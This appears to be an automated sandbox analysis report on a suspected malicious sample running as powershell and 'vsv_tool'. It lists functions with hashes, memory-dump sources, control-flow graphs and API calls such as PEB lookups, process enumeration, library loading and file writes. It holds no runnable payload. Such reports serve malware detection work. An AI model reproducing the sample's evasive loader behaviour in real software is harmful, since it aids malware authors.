                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8f7ca47b7483fb393873270f203b4afb7fde0066bff0baf984f18fa923b7d598
                                                                                                                                        • Instruction ID: fc35ee013c0aa1f8d55bfa5911c56a013a9586e34c7536080775069c0696e4ba
                                                                                                                                        • Opcode Fuzzy Hash: 8f7ca47b7483fb393873270f203b4afb7fde0066bff0baf984f18fa923b7d598
                                                                                                                                        • Instruction Fuzzy Hash: D3210574A006099FCB04CF99C8849AAFBB1FF4C310B2485A9E949EB361C731FD51CBA0
                                                                                                                                        Function 02FFD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.2149404311.0000000002FFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FFD000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_2ffd000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: fcb1eaaa5dbb2f4f8c30ab4d72b6866ba83ac4d210be402d8561d75059c4f016
                                                                                                                                        • Instruction ID: 05dc6c2481f5796cce1033a5102886bcbd6e5decb9ff8c562694e3a117b15417
                                                                                                                                        • Opcode Fuzzy Hash: fcb1eaaa5dbb2f4f8c30ab4d72b6866ba83ac4d210be402d8561d75059c4f016
                                                                                                                                        • Instruction Fuzzy Hash: C1012B72505340AAE7608A1ACCC4B67BFE8DF41BA4F08C52AEF084F55AC3799841C6B1
                                                                                                                                        Function 02FFD005 Relevance: .0, Instructions: 45COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.2149404311.0000000002FFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FFD000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_2ffd000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 9b55f97027e92a6e1ba710e8d2b4b2bb126948488b714216109319f0bd31ff01
                                                                                                                                        • Instruction ID: a15714c4e575f7635f2ddde11b9dbda38e315b3f7c2971ee770f6e3eea96f155
                                                                                                                                        • Opcode Fuzzy Hash: 9b55f97027e92a6e1ba710e8d2b4b2bb126948488b714216109319f0bd31ff01
                                                                                                                                        • Instruction Fuzzy Hash: F701527240E3C09ED7138B258C94B52BFB4DF43624F1D81DBDA888F5A7C2695849C772
                                                                                                                                        Function 04C0491B Relevance: .0, Instructions: 45COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.2149721885.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_4c00000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 70307aae6b2937e88648396fa8463e926015cbb341c390ee47112555644d277a
                                                                                                                                        • Instruction ID: 72e1babc297830ec38bdbabd46045a6a1530ee4cb37a4cc3297bedc995464a1b
                                                                                                                                        • Opcode Fuzzy Hash: 70307aae6b2937e88648396fa8463e926015cbb341c390ee47112555644d277a
                                                                                                                                        • Instruction Fuzzy Hash: 980162B8B002199FCB04DB98D490AAEF775FF8D314B2481A9D95A9B361CB35EC03CB50

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 077C08A0 Relevance: 9.1, Strings: 7, Instructions: 315COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.2154114053.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_77c0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'tq$4'tq$tPtq$tPtq$$tq$$tq$$tq
                                                                                                                                        • API String ID: 0-3181550632
                                                                                                                                        • Opcode ID: e34473459932d986f91dfbbbab1876aa5e45b5ac559d2ae1bd57259540c3bbdf
                                                                                                                                        • Instruction ID: 8115f8640b958e61d8f345c78fd9817d71a6963931feb157df2609983d53b5e5
                                                                                                                                        • Opcode Fuzzy Hash: e34473459932d986f91dfbbbab1876aa5e45b5ac559d2ae1bd57259540c3bbdf
                                                                                                                                        • Instruction Fuzzy Hash: 16A122B270821ACFD725DA698C1067AFBA1AFCA390F1884AFD945CB251DB35C841C7E1
                                                                                                                                        Function 077C14E8 Relevance: 6.4, Strings: 5, Instructions: 190COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.2154114053.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_77c0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'tq$4'tq$$tq$$tq$$tq
                                                                                                                                        • API String ID: 0-2409360608
                                                                                                                                        • Opcode ID: 69acf29b0c6ca43a6965bee586f1ab80c788ba3cf7d12297973e974d819a7021
                                                                                                                                        • Instruction ID: 247faa63d265ef84f62367344b1c9c0a118172253cb089acc709574d6556c45f
                                                                                                                                        • Opcode Fuzzy Hash: 69acf29b0c6ca43a6965bee586f1ab80c788ba3cf7d12297973e974d819a7021
                                                                                                                                        • Instruction Fuzzy Hash: A95157F1B0420E8FCB25D66D9400766BBA6AFCA394F58847FD906DB242DE35C851C7A1
                                                                                                                                        Function 077C3518 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.2154114053.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_77c0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $tq$$tq$$tq$$tq
                                                                                                                                        • API String ID: 0-173548568
                                                                                                                                        • Opcode ID: a86ce014144130ac527030770c404513eeb1b80c1c32b68d6367e45b3d9b310d
                                                                                                                                        • Instruction ID: cb27b1a24f24d667c3491eea4b3d1c089689fec08046331810d3a0393fd2ac3d
                                                                                                                                        • Opcode Fuzzy Hash: a86ce014144130ac527030770c404513eeb1b80c1c32b68d6367e45b3d9b310d
                                                                                                                                        • Instruction Fuzzy Hash: 072138B13142066BDB34957EA840B37FE9A9BC9394F24C43EAA05DB381DE39D841C363
                                                                                                                                        Function 077C0570 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.2154114053.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_77c0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'tq$4'tq$$tq$$tq
                                                                                                                                        • API String ID: 0-3085001694
                                                                                                                                        • Opcode ID: 40f1d46031bc972d71cd99bbd0e3cb8ddb6840660aaff2e6cbb6789f0d9c48a4
                                                                                                                                        • Instruction ID: a592df0b124c623b22f4fc73ab30573bb23d30e80b0ba0f1dd08765666f21da6
                                                                                                                                        • Opcode Fuzzy Hash: 40f1d46031bc972d71cd99bbd0e3cb8ddb6840660aaff2e6cbb6789f0d9c48a4
                                                                                                                                        • Instruction Fuzzy Hash: E1F02DD170C2598BC72A51683C20A65DB72DBDA7D0724005FC742DF345DD258C42C3E2

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:17.7%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:5.7%
                                                                                                                                        Total number of Nodes:140
                                                                                                                                        Total number of Limit Nodes:6
                                                                                                                                        execution_graph 2573 be656b 2576 be590b 2573->2576 2575 be6577 2577 be5974 2576->2577 2629 be48bb 2577->2629 2579 be59a9 2580 be48bb GetPEB 2579->2580 2581 be59c0 2580->2581 2632 be518b 2581->2632 2583 be5c38 2635 be43db 2583->2635 2585 be5c55 2638 be46fb 2585->2638 2587 be5c72 2588 be518b GlobalAlloc 2587->2588 2589 be5d7a 2588->2589 2642 be436b 2589->2642 2591 be5d97 2592 be46fb 2 API calls 2591->2592 2593 be5daa 2592->2593 2645 be51eb 2593->2645 2595 be5e22 2652 be445b 2595->2652 2597 be5efe 2655 be4acb CreateFileW 2597->2655 2599 be5f20 2661 be53eb 2599->2661 2601 be5f60 2602 be606e 2601->2602 2603 be601a 2601->2603 2605 be60a6 2602->2605 2606 be6076 2602->2606 2665 be559b 2603->2665 2607 be518b GlobalAlloc 2605->2607 2669 be456b 2606->2669 2611 be60b3 2607->2611 2608 be6066 2614 be6385 2608->2614 2626 be6336 2608->2626 2692 be3d5b 2608->2692 2612 be518b GlobalAlloc 2611->2612 2613 be6131 2612->2613 2673 be44ab 2613->2673 2615 be518b GlobalAlloc 2614->2615 2614->2626 2617 be6432 2615->2617 2619 be46fb 2 API calls 2617->2619 2618 be6183 2621 be518b GlobalAlloc 2618->2621 2624 be629b 2618->2624 2620 be6469 2619->2620 2623 be518b GlobalAlloc 2620->2623 2627 be61de 2621->2627 2623->2626 2624->2608 2688 be3b5b 2624->2688 2626->2575 2627->2624 2678 be3eab 2627->2678 2681 be56cb 2627->2681 2695 be58bb GetPEB 2629->2695 2631 be48db 2631->2579 2633 be519b 2632->2633 2634 be51a7 GlobalAlloc 2632->2634 2633->2634 2634->2583 2636 be518b GlobalAlloc 2635->2636 2637 be43ea 2636->2637 2637->2585 2639 be518b GlobalAlloc 2638->2639 2640 be470c 2639->2640 2641 be471f LoadLibraryW 2640->2641 2641->2587 2643 be518b GlobalAlloc 2642->2643 2644 be437a 2643->2644 2644->2591 2647 be5200 2645->2647 2646 be518b GlobalAlloc 2646->2647 2647->2646 2648 be5238 NtQuerySystemInformation 2647->2648 2651 be5226 2647->2651 2648->2647 2649 be5264 2648->2649 2650 be518b GlobalAlloc 2649->2650 2650->2651 2651->2595 2653 be518b GlobalAlloc 2652->2653 2654 be4469 2653->2654 2654->2597 2656 be4aff 2655->2656 2657 be4af8 2655->2657 2656->2657 2658 be518b GlobalAlloc 2656->2658 2657->2599 2659 be4b3b ReadFile 2658->2659 2659->2657 2660 be4b76 CloseHandle 2659->2660 2660->2657 2662 be53fc 2661->2662 2663 be46fb 2 API calls 2662->2663 2664 be54d1 2663->2664 2664->2601 2666 be55be 2665->2666 2667 be5653 2666->2667 2668 be56cb 4 API calls 2666->2668 2667->2608 2668->2666 2670 be458e 2669->2670 2671 be45dc 2670->2671 2672 be3b5b GlobalAlloc 2670->2672 2671->2608 2672->2670 2674 be518b GlobalAlloc 2673->2674 2675 be44bc 2674->2675 2676 be518b GlobalAlloc 2675->2676 2677 be44de 2676->2677 2677->2618 2696 be40fb 2678->2696 2680 be3ef0 2680->2627 2682 be44ab GlobalAlloc 2681->2682 2683 be56da 2682->2683 2702 be50bb CreateFileW 2683->2702 2687 be56ff 2687->2627 2689 be3b8c 2688->2689 2690 be3b85 2688->2690 2689->2690 2691 be518b GlobalAlloc 2689->2691 2690->2608 2691->2689 2693 be518b GlobalAlloc 2692->2693 2694 be3d6e 2693->2694 2694->2614 2695->2631 2697 be410a 2696->2697 2698 be518b GlobalAlloc 2697->2698 2701 be4116 2697->2701 2699 be4201 2698->2699 2700 be518b GlobalAlloc 2699->2700 2700->2701 2701->2680 2703 be50ec WriteFile 2702->2703 2704 be50e8 2702->2704 2703->2704 2704->2687 2705 be671b 2704->2705 2706 be672c 2705->2706 2707 be67bf malloc 2706->2707 2708 be676b 2706->2708 2707->2708 2708->2687 2724 be461b 2729 be3e6b 2724->2729 2726 be4633 2727 be4acb 4 API calls 2726->2727 2728 be465b 2727->2728 2730 be518b GlobalAlloc 2729->2730 2731 be3e79 2730->2731 2731->2726 2732 be3b43 2733 be3b8c 2732->2733 2734 be3b85 2732->2734 2733->2734 2735 be518b GlobalAlloc 2733->2735 2735->2733 2709 be62a1 2715 be61f1 2709->2715 2710 be629b 2712 be632c 2710->2712 2713 be3b5b GlobalAlloc 2710->2713 2711 be3eab GlobalAlloc 2711->2715 2714 be3d5b GlobalAlloc 2712->2714 2717 be6385 2712->2717 2723 be6336 2712->2723 2713->2712 2714->2717 2715->2710 2715->2711 2716 be56cb 4 API calls 2715->2716 2716->2715 2718 be518b GlobalAlloc 2717->2718 2717->2723 2719 be6432 2718->2719 2720 be46fb 2 API calls 2719->2720 2721 be6469 2720->2721 2722 be518b GlobalAlloc 2721->2722 2722->2723

                                                                                                                                        Executed Functions

                                                                                                                                        Function 00BE51EB Relevance: 1.6, APIs: 1, Instructions: 123nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 21 be51eb-be51f9 22 be5200-be5207 21->22 23 be520d-be5224 call be518b 22->23 24 be5352-be5356 22->24 27 be522b-be5258 call be4bfb NtQuerySystemInformation 23->27 28 be5226 23->28 31 be525a-be5262 27->31 32 be5264-be5281 call be518b 27->32 28->24 31->22 35 be5284-be528a 32->35 36 be534b 35->36 37 be5290-be5297 35->37 36->24 38 be529d-be52bd call be4bfb 37->38 39 be533b-be5346 37->39 42 be52c8-be52ce 38->42 39->35 43 be52f4-be5320 call be4fbb call be483b 42->43 44 be52d0-be52dc 42->44 51 be532a-be5333 43->51 52 be5322-be5328 43->52 44->43 45 be52de-be52f2 44->45 45->42 51->39 53 be5335-be5338 51->53 52->39 53->39
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00BE518B: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 00BE51BB
                                                                                                                                        • NtQuerySystemInformation.NTDLL(00000005,00000000,00040000,00040000), ref: 00BE524F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000031.00000002.2940372296.0000000000BE3000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BE3000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_49_2_be3000_vsv_tool.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocGlobalInformationQuerySystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3737350999-0
                                                                                                                                        • Opcode ID: 4b7043f871755b58f40638a0e80aec111520236eadfc74e0803d840394cff95c
                                                                                                                                        • Instruction ID: 60b55acb35e03e594bcf4fd4b1fb6670d6ba4718d70a5c58876246335d3cd1c5
                                                                                                                                        • Opcode Fuzzy Hash: 4b7043f871755b58f40638a0e80aec111520236eadfc74e0803d840394cff95c
                                                                                                                                        • Instruction Fuzzy Hash: A15128B5D00649EFCB14CF99C880AEEB7F5FF48304F208199E915AB340D775AA41CBA4
                                                                                                                                        Function 00BE4ACB Relevance: 4.6, APIs: 3, Instructions: 79fileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,?), ref: 00BE4AED
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000031.00000002.2940372296.0000000000BE3000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BE3000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_49_2_be3000_vsv_tool.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                        • Opcode ID: 811ed88586e1a9313cd571564231c22e97687d35a065f62fc27905b3f91c6921
                                                                                                                                        • Instruction ID: d4fb8ca63fd9a9e53bc17e2ad47db4056b63b84108b1ac33a5ed965938d0f665
                                                                                                                                        • Opcode Fuzzy Hash: 811ed88586e1a9313cd571564231c22e97687d35a065f62fc27905b3f91c6921
                                                                                                                                        • Instruction Fuzzy Hash: 37319B75A00108FFCB14DF99C891F9EB7B9EF48310F208199E919AB291D771AE41DB54
                                                                                                                                        Function 00BE50BB Relevance: 3.0, APIs: 2, Instructions: 50fileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 13 be50bb-be50e6 CreateFileW 14 be50ec-be510f WriteFile 13->14 15 be50e8-be50ea 13->15 17 be5121-be512d 14->17 18 be5111-be511f 14->18 16 be512f-be5132 15->16 17->16 18->16
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00BE50DD
                                                                                                                                        • WriteFile.KERNELBASE(000000FF,00000000,?,00000000,00000000), ref: 00BE510B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000031.00000002.2940372296.0000000000BE3000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BE3000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_49_2_be3000_vsv_tool.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CreateWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2263783195-0
                                                                                                                                        • Opcode ID: 25e051ee84f5a1836dda3222278f4334694447e0a98cf775cf13d888adafe703
                                                                                                                                        • Instruction ID: 8483633609da24ef8fb71fbc7b70b3a783a620ac00677e39849fb342dc3a4a6f
                                                                                                                                        • Opcode Fuzzy Hash: 25e051ee84f5a1836dda3222278f4334694447e0a98cf775cf13d888adafe703
                                                                                                                                        • Instruction Fuzzy Hash: 9801E175640508FBDB10DE59DD91F9A73B9AF48314F20C194FA19AB291D731EE02DB90
                                                                                                                                        Function 00BE46FB Relevance: 1.5, APIs: 1, Instructions: 25libraryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 54 be46fb-be4737 call be518b call be4ccb LoadLibraryW
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00BE518B: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 00BE51BB
                                                                                                                                        • LoadLibraryW.KERNELBASE(?), ref: 00BE472C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000031.00000002.2940372296.0000000000BE3000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BE3000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_49_2_be3000_vsv_tool.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocGlobalLibraryLoad
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3361179946-0
                                                                                                                                        • Opcode ID: 1feaf0e274cf16ef0741fa9d108665e6c366966b39e006d739153cc267d6f199
                                                                                                                                        • Instruction ID: 233af467fa6967f0239d6021b4c854fb87690da47bdd8803354b7a90fd94210d
                                                                                                                                        • Opcode Fuzzy Hash: 1feaf0e274cf16ef0741fa9d108665e6c366966b39e006d739153cc267d6f199
                                                                                                                                        • Instruction Fuzzy Hash: 87E0E575E00108BFCB00DFA8DD4199D7BB89F48201F108194F90897344E631AE118791
                                                                                                                                        Function 00BE671B Relevance: 1.5, APIs: 1, Instructions: 204COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 59 be671b-be6769 call be4bfb 64 be676b-be676d 59->64 65 be6772-be67aa 59->65 66 be694e-be6951 64->66 69 be67bf-be67eb malloc 65->69 70 be67ac-be67ba 65->70 71 be67f6-be67fc 69->71 70->66 73 be67fe-be6805 71->73 74 be687c-be6880 71->74 77 be6810-be6816 73->77 75 be68a4-be68bb call be57eb 74->75 76 be6882-be689f 74->76 84 be68dc-be6908 75->84 85 be68bd-be68da 75->85 76->66 78 be6818-be6832 77->78 79 be6877 77->79 86 be6837-be6875 call be658b 78->86 79->71 88 be6913-be691b 84->88 85->66 86->77 92 be691d-be693e 88->92 93 be6940-be694c 88->93 92->88 93->66
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000031.00000002.2940372296.0000000000BE3000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BE3000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_49_2_be3000_vsv_tool.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: dbb50fb56afd143785edb8b3f824610f8feaaf99d530fe6b5dcc6f423fa21a8f
                                                                                                                                        • Instruction ID: f84a2393f7d43e7bf97b50db80fdd6410470f82910de093d4055b5333a479ae2
                                                                                                                                        • Opcode Fuzzy Hash: dbb50fb56afd143785edb8b3f824610f8feaaf99d530fe6b5dcc6f423fa21a8f
                                                                                                                                        • Instruction Fuzzy Hash: 6591E8B5D04249EFCB08CF99D880AEEBBF5BF98310F108199E515AB355D734AA41CFA0
                                                                                                                                        Function 00BE518B Relevance: 1.3, APIs: 1, Instructions: 23memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 121 be518b-be5199 122 be519b-be51a4 121->122 123 be51a7-be51c0 GlobalAlloc 121->123 122->123
                                                                                                                                        APIs
                                                                                                                                        • GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 00BE51BB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000031.00000002.2940372296.0000000000BE3000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BE3000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_49_2_be3000_vsv_tool.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocGlobal
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3761449716-0
                                                                                                                                        • Opcode ID: 9e5e02ec3ae36198606aa10b822d832cfef97aae54456fdc6b76e3fc24730506
                                                                                                                                        • Instruction ID: 22341295c93b30477c5cf4e6811575b780c8450383861a3121def844927665f7
                                                                                                                                        • Opcode Fuzzy Hash: 9e5e02ec3ae36198606aa10b822d832cfef97aae54456fdc6b76e3fc24730506
                                                                                                                                        • Instruction Fuzzy Hash: C6F09278614208EFCB44CF58D480A99B7A5EB88324F10C299AC188B301D630EE81CB94
                                                                                                                                        Function 0087CA28 Relevance: .1, Instructions: 52COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 339 87ca28-87ca5d 340 87ca63-87ca6f call 87c7b8 339->340 343 87ca92-87ca9a 340->343 344 87ca71-87ca8d 340->344 345 87caa5-87caba 343->345 346 87ca9c-87caa0 call 87d27c 343->346 344->343 346->345
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000031.00000002.2940372296.000000000087C000.00000020.00000001.01000000.0000000F.sdmp, Offset: 0087C000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_49_2_87c000_vsv_tool.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: de664829c2f3fcb68b3e7426573d848cee77fb0a7238f371faa9a47000340301
                                                                                                                                        • Instruction ID: 3e95be7c59e6083caafd395291ef4367645f336a4351e903ab13f97bd08a79a7
                                                                                                                                        • Opcode Fuzzy Hash: de664829c2f3fcb68b3e7426573d848cee77fb0a7238f371faa9a47000340301
                                                                                                                                        • Instruction Fuzzy Hash: 49018070200214AFDB50EF6CED82A5A77EDFB49310B4158A9F908C7356DA74EC419B60
                                                                                                                                        Function 0087C9F0 Relevance: .0, Instructions: 21COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 366 87c9f0-87c9fd call 87c7b8 369 87ca12-87ca19 366->369 370 87c9ff-87ca03 366->370 373 87ca22-87ca24 369->373 370->369 371 87ca05-87ca0c call 87c98c 370->371 371->369
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000031.00000002.2940372296.000000000087C000.00000020.00000001.01000000.0000000F.sdmp, Offset: 0087C000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_49_2_87c000_vsv_tool.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ee07f5023dc0d96b754cc0171f9b2c7b07269112c1f717584af23fed1d3b5a05
                                                                                                                                        • Instruction ID: 9c5a0e60f86707a008ad9021674797a92e072c035e8d80bb5e4fcd5590c9a6b2
                                                                                                                                        • Opcode Fuzzy Hash: ee07f5023dc0d96b754cc0171f9b2c7b07269112c1f717584af23fed1d3b5a05
                                                                                                                                        • Instruction Fuzzy Hash: BFD05E917003140ACFE4BE7E4DC2B564EE8EB09386F4054BE798CD724BEA64CC485751
                                                                                                                                        Function 0087C7C0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 378 87c7c0-87c7c4 379 87c7c6 call 87ca28 378->379 380 87c7cb 378->380 379->380
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000031.00000002.2940372296.000000000087C000.00000020.00000001.01000000.0000000F.sdmp, Offset: 0087C000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_49_2_87c000_vsv_tool.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: cbaef350a031b0f30ea73a90b24e8774050fcc671b9a2ea6f4c83847aafd68f8
                                                                                                                                        • Instruction ID: c90b02578302a69fc2acbc09a65dc7178fb0bd685acdfa50ae336baa5d2b6d5d
                                                                                                                                        • Opcode Fuzzy Hash: cbaef350a031b0f30ea73a90b24e8774050fcc671b9a2ea6f4c83847aafd68f8
                                                                                                                                        • Instruction Fuzzy Hash: 72A002B64205298DDAA4B66A8045F546154FBA0766FC2E09CB408C745A4BB8C4888F52

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 00BE58BB Relevance: .0, Instructions: 9COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000031.00000002.2940372296.0000000000BE3000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BE3000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_49_2_be3000_vsv_tool.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                                                                                                                                        • Instruction ID: 3aed54436f5767a83b01f55326dea564c088d466d319321e9a1229c6b183aa19
                                                                                                                                        • Opcode Fuzzy Hash: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                                                                                                                                        • Instruction Fuzzy Hash: DCC04C7595664CEBC711CB89D541A59B7FCE709650F100195EC0893700D5356E109595